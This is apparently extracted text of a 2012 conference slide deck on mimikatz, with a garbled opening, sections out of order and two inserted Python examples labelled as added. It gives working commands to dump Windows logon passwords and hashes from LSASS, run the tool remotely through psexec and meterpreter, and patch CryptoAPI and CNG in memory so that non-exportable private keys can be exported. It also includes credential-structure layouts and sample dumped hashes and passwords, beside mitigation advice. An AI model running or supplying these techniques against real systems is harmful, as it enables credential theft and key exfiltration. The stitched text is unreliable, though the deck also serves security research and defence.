Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz::sekurlsa - what we can do

Basics
- No physical access to the computer (first step to pass the hash, then pass the pass)
- No admin rights, system rights, debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;))
- For privileged accounts: network login instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights, system rights, debug privileges, even for VIPs
- Use a separated network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Take the opportunities to drop backward compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz::crypto - what is it?

A little module that I wrote to
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  • Even those which are "not" exportable

What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public, in DER format
    - with private keys, in PFX format
  • Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI, in mimikatz context
  • CNG, in LSASS context (again ;))

(mod_mimikatz_crypto)
mimikatz::crypto - how it's protected

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least without the master keys and/or password of the users

Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"

Export/Usage can be limited by:
- Password
- Popup
  (password and popup: a constraint for most users, unavailable for computer keys)
- Export/Archive flag not present

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz::crypto::capi - how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
- http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...

Processes deal with cryptographic keys through this API...
mimikatz::crypto::capi - how it's exported ( level)

[Diagram: inside the process, CryptoAPI and the RSA CSP ("PLAYSKOOL") load the private key (DPAPI decode); on "ask to export key", Exportable = yes gives the exported key, Exportable = no gives NTE_BAD_KEY_STATE.]
mimikatz::crypto::patchcapi - because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider : Microsoft Enhanced Cryptographic Provider v1.0
    Type : AT_KEYEXCHANGE
    Exportabilité : NON
    Taille clé : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz::crypto::patchcapi - because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz::crypto::patchcapi - demo time

Import, export, import as not exportable... export
mimikatz::crypto::patchcapi - limitations

Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve, a little...

mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz::crypto::cng - how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
- http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions

It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz::crypto::cng - how it's exported ( level)

[Diagram: the process calls CNG, which goes over RPC to the KeyIso service in the LSASS process (an NT6 System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP). There the private key is loaded (DPAPI decode, "PLAYSKOOL"); on "ask to export key", Exportable = yes gives the exported key, Exportable = no gives NTE_NOT_SUPPORTED.]
mimikatz::crypto::patchcng - because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz::crypto::patchcng - because sometimes I own LSASS

This time checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...

.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
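As an added example (not code from the slides or from mimikatz), the Python below decodes the branch encodings printed on the capi and cng patch slides the way an integrity check comparing on-disk code with the loaded image would classify them: it computes the target of each `jnz`/`jmp` and reports when a conditional branch has become an unconditional jump to the same address. Addresses and bytes are those shown on the slides; the function and constant names are my own.

```python
import struct

# Branch opcodes handled (assumed sufficient for the slides' listings).
JCC_SHORT = range(0x70, 0x80)   # 7x rel8        (75 = jnz short)
JMP_SHORT = 0xEB                # EB rel8        (jmp short)
JCC_NEAR_PREFIX = 0x0F          # 0F 8x rel32    (0F 85 = jnz near)
JMP_NEAR = 0xE9                 # E9 rel32       (jmp near)
NOP = 0x90


def decode_branch(code: bytes, addr: int):
    """Decode the instruction at the start of `code`, located at `addr`.
    Returns (mnemonic, length, target); target is None for a nop."""
    op = code[0]
    if op in JCC_SHORT or op == JMP_SHORT:
        rel = struct.unpack_from("<b", code, 1)[0]          # signed 8-bit displacement
        kind = "jmp_short" if op == JMP_SHORT else "jcc_short"
        return (kind, 2, (addr + 2 + rel) & 0xFFFFFFFF)     # relative to next instruction
    if op == JCC_NEAR_PREFIX and len(code) >= 6 and 0x80 <= code[1] <= 0x8F:
        rel = struct.unpack_from("<i", code, 2)[0]          # signed 32-bit displacement
        return ("jcc_near", 6, (addr + 6 + rel) & 0xFFFFFFFF)
    if op == JMP_NEAR:
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp_near", 5, (addr + 5 + rel) & 0xFFFFFFFF)
    if op == NOP:
        return ("nop", 1, None)
    raise ValueError(f"unsupported instruction at {addr:08X}: {code[:6].hex()}")


def decode_all(code: bytes, addr: int):
    """Decode a short byte sequence into [(address, mnemonic, target), ...]."""
    out, off = [], 0
    while off < len(code):
        mnemonic, length, target = decode_branch(code[off:], addr + off)
        out.append((addr + off, mnemonic, target))
        off += length
    return out


def condition_removed(original: bytes, patched: bytes, addr: int):
    """Compare the on-disk bytes with the in-memory bytes of one branch site.
    Returns (flag, original_target, patched_target): flag is True when a
    conditional branch was turned into an unconditional jump to the same
    target (nops are ignored, which is how 'nop; jmp rel32' keeps its
    5-byte jmp ending on the same byte as the 6-byte 'jnz rel32')."""
    orig = [x for x in decode_all(original, addr) if x[1] != "nop"]
    new = [x for x in decode_all(patched, addr) if x[1] != "nop"]
    if len(orig) != 1 or len(new) != 1:
        return (False, None, None)
    (_, om, ot), (_, nm, nt) = orig[0], new[0]
    return (om.startswith("jcc") and nm.startswith("jmp") and ot == nt, ot, nt)


# Byte sequences from the slides (constructed here as test vectors).
CAPI_ORIG = bytes.fromhex("0F8533C7FFFF")       # .text:0AC0B7CB jnz continue_key_export_or_archive
CAPI_PATCHED = bytes.fromhex("90E933C7FFFF")    # nop ; jmp continue_key_export_or_archive
CNG_ORIG = bytes.fromhex("751C")                # .text:6C815210 jnz short continue_key_export
CNG_PATCHED = bytes.fromhex("EB1C")             # jmp short continue_key_export

if __name__ == "__main__":
    print(condition_removed(CAPI_ORIG, CAPI_PATCHED, 0x0AC0B7CB))   # (True, 0x0AC07F04, 0x0AC07F04)
    print(condition_removed(CNG_ORIG, CNG_PATCHED, 0x6C815210))     # (True, 0x6C81522E, 0x6C81522E)
```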
mimikatz::crypto::patchcng - demo time

Import, export, import as not exportable... export again
mimikatz::crypto::patchcng - limitations

The patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM

mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz::crypto::patchcng - bonus

After one admin patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil

(before patch)
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

(after patch)
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil : -exportPFX La commande s'est terminée correctement.
mimikatz::crypto - memo

Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
- PFX files are protected by this password: mimikatz

Keys
- When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz::crypto - what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts / computer
- no admin, no admin, no admin...

Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM

More in depth
- See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementation (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz - what else can it do?

- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • ...
- ...
mimikatz - that's all folks

Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft to always consider it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
- You for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number

Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz::sekurlsa::tspkg - symbols & theory

Let's explore some symbols
- sounds cool... (thanks Microsoft)

Let's imagine a scenario
- Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials...

kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz::sekurlsa::tspkg - workflow

[Diagram: LsaEnumerateLogonSessions, then for each LUID: look up tspkg!TSGlobalCredTable with RtlLookupElementGenericTableAvl to get a KIWI_TS_CREDENTIAL, follow pTsPrimary to the KIWI_TS_PRIMARY_CREDENTIAL, and call LsaUnprotectMemory on it: password in clear.]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz::sekurlsa::tspkg - demo time

sekurlsa::tspkg

mimikatz::sekurlsa::wdigest
because clear text password over http/https is not cool
mimikatz::sekurlsa::wdigest - what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. [...]"
Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP"
Microsoft: http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool:
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz::sekurlsa::wdigest - what is it?

We speak about hashes, but what hashes?
H = MD5(HA1:nonce:[...]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[...])

Even after login, HA1 may change... the realm is from the server side and cannot be determined before Windows logon
The WDigest provider must have the elements to compute responses for different servers:
- Username
- Realm (from server)
- Password
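The reasoning above, as an added example that is not code from the slides: a Digest client that kept only its password can answer challenges from any realm, while one that pre-computed a single HA1 at logon cannot answer a second realm; the server side needs only HA1 for its own realm (the "hashes for each realm" of Advanced Digest). The user names, realms and class names are constructed for the example; the `[...]` fields (qop, nc, cnonce) are left out to stay with the slide's simplified formula.

```python
import hashlib
import secrets


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    # HA1 = MD5(username:realm:password)
    return md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    # HA2 = MD5(method:digestURI)
    return md5_hex(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, method: str, digest_uri: str) -> str:
    # H = MD5(HA1:nonce:HA2), the slide's formula without the optional qop fields
    return md5_hex(f"{h1}:{nonce}:{ha2(method, digest_uri)}")


class DigestServer:
    """Server side: stores only HA1 for its own realm and never needs the
    clear password to verify a response."""

    def __init__(self, realm: str, users: dict):
        self.realm = realm
        self.ha1_db = {u: ha1(u, realm, p) for u, p in users.items()}

    def challenge(self) -> dict:
        return {"realm": self.realm, "nonce": secrets.token_hex(8)}

    def verify(self, username, nonce, method, uri, response) -> bool:
        h1 = self.ha1_db.get(username)
        return h1 is not None and response_from_ha1(h1, nonce, method, uri) == response


class ClientKeepingPassword:
    """What the WDigest provider has to do: keep username + password and
    derive HA1 only once the server's realm is known."""

    def __init__(self, username: str, password: str):
        self.username, self.password = username, password

    def answer(self, challenge: dict, method: str, uri: str) -> str:
        h1 = ha1(self.username, challenge["realm"], self.password)
        return response_from_ha1(h1, challenge["nonce"], method, uri)


class ClientKeepingOneHa1:
    """A client that pre-computed HA1 for one realm at Windows logon and
    forgot the password: it can only answer that realm."""

    def __init__(self, username: str, realm: str, password: str):
        self.username, self.h1 = username, ha1(username, realm, password)

    def answer(self, challenge: dict, method: str, uri: str) -> str:
        return response_from_ha1(self.h1, challenge["nonce"], method, uri)


def demo() -> dict:
    # Constructed account and realms; the account mirrors the slides' demo user.
    users = {"gentilkiwi": "waza1234"}
    servers = {"web": DigestServer("intranet.example", users),
               "ldap": DigestServer("ldap.example", users)}
    with_pw = ClientKeepingPassword("gentilkiwi", "waza1234")
    one_ha1 = ClientKeepingOneHa1("gentilkiwi", "intranet.example", "waza1234")
    results = {}
    for name, srv in servers.items():
        ch = srv.challenge()
        for label, client in (("password_client", with_pw), ("one_ha1_client", one_ha1)):
            resp = client.answer(ch, "GET", "/")
            results[f"{label}_{name}"] = srv.verify("gentilkiwi", ch["nonce"], "GET", "/", resp)
    return results


if __name__ == "__main__":
    print(demo())  # only one_ha1_client_ldap is False
```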
mimikatz::sekurlsa::wdigest - theory

This time we know:
- that WDigest keeps the password in memory « by protocol » for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protects them with LsaProtectMemory)

LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- Hypothesis seems verified

.text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]

LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList

.text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz::sekurlsa::wdigest - workflow

[Diagram: LsaEnumerateLogonSessions, then for each LUID: search the linked list wdigest!l_LogSessList for the LUID to get the KIWI_WDIGEST_LIST_ENTRY, and call LsaUnprotectMemory on its Password: password in clear.]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* [...] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

mimikatz::sekurlsa::wdigest - demo time

sekurlsa::wdigest
mimikatz::sekurlsa::livessp
because Microsoft was too good in closed networks

mimikatz::sekurlsa::livessp - how?

Actually I've only used a logical (empirical) approach to search passwords...
- Protocol reading
- Symbols searching

~ Boring ~... be more brutal this time: make a WinDBG trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz::sekurlsa::livessp - how?

Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

Our LiveSSP provider:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah, Pass the Hash capability with Live account too...
Live user can logon through RDP via SSO
mimikatz::sekurlsa::livessp - workflow

[Diagram: LsaEnumerateLogonSessions, then for each LUID: search the linked list livessp!LiveGlobalLogonSessionList for the LUID to get the KIWI_LIVESSP_LIST_ENTRY, follow suppCreds to the KIWI_LIVESSP_PRIMARY_CREDENTIAL, and call LsaUnprotectMemory on it: password in clear.]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

mimikatz::sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz::sekurlsa::kerberos

Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

Kerberos ticket part? Maybe ;)
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

Kerberos part for password:
lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz::sekurlsa::kerberos (nt6) - workflow

[Diagram: LsaEnumerateLogonSessions, then for each LUID: look up kerberos!KerbGlobalLogonSessionTable with RtlLookupElementGenericTableAvl to get the KIWI_KERBEROS_PRIMARY_CREDENTIAL, and call LsaUnprotectMemory on its Password: password in clear.]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz::sekurlsa::kerberos (nt5) - workflow

